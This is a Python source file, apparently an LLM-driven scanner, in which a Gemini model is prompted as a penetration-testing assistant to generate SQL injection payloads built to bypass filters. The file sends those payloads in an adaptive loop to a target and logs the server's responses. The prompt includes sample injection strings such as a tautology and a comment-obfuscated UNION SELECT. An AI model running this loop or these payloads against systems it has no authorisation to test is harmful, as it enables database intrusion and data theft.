import os
import json
import sqlparse
from dotenv import load_dotenv
import google.generativeai as genai


class GeminiFeedbackAgent:
    def __init__(self):
        load_dotenv()
        api_key = os.getenv("GEMINI_API_KEY")

        if not api_key:
            raise RuntimeError("GEMINI_API_KEY missing in environment variables")

        genai.configure(api_key=api_key)
        self.model = genai.GenerativeModel("gemini-2.5-flash")

  
    # Validate SQL structure
    def is_valid_sql(self, payload: str) -> bool:
        try:
            parsed = sqlparse.parse(payload)
            return len(parsed) > 0
        except Exception:
            return False

    
    # LLM Payload Generator
    def generate_refined_payloads(self, attempt_response_dict):

        prompt = f"""
        You are an expert penetration testing assistant performing adaptive SQL injection discovery.

        Historical attempts with server responses:

        {json.dumps(attempt_response_dict, indent=2)}

        Your objectives:
        - Infer filtering logic and database behavior
        - Generate NEW refined SQL injection payloads only
        - Focus on bypass techniques and vulnerability confirmation

        Allowed techniques:
        inline comments, encoding, boolean logic, time delays, query restructuring, case tricks

        STRICT OUTPUT:
            Return ONLY a JSON array of SQL injection strings.
        Example:
        [
            "' OR 1=1--",
            "'/**/UNION/**/SELECT/**/NULL,NULL--"
        ]

        No text outside JSON.
        """

        response = self.model.generate_content(prompt)
        raw = response.text.strip()

        # Auto-extract JSON
        start = raw.find("[")
        end = raw.rfind("]") + 1

        if start == -1 or end == -1:
            raise ValueError("LLM did not return JSON list")

        payloads = json.loads(raw[start:end])

        # SQL validation
        valid_payloads = [
            p for p in payloads if isinstance(p, str) and self.is_valid_sql(p)
        ]

        return valid_payloads

    
    # Feedback Loop 
    def adaptive_loop(self, tester_func, initial_history=None, max_rounds=5):
        """
        tester_func(payload) -> server response string
        """
        # Start with the history generated by the scanner's seed payloads
        history = initial_history if initial_history is not None else {}

        for round_num in range(1, max_rounds + 1):
            print(f"\n--- AI Round {round_num} ---")

            # Update the prompt logic slightly to request 5 queries
            new_payloads = self.generate_refined_payloads(history)

            if not new_payloads:
                print("No valid payloads generated — stopping.")
                break

            # Limit to the first 5 queries generated by Gemini this round
            for payload in new_payloads[:5]:
                if payload in history:
                    continue

                response = tester_func(payload)
                history[payload] = response

                print(f"[AI TRY] {payload}")
                print(f"[AI RESP] {response}")

        return history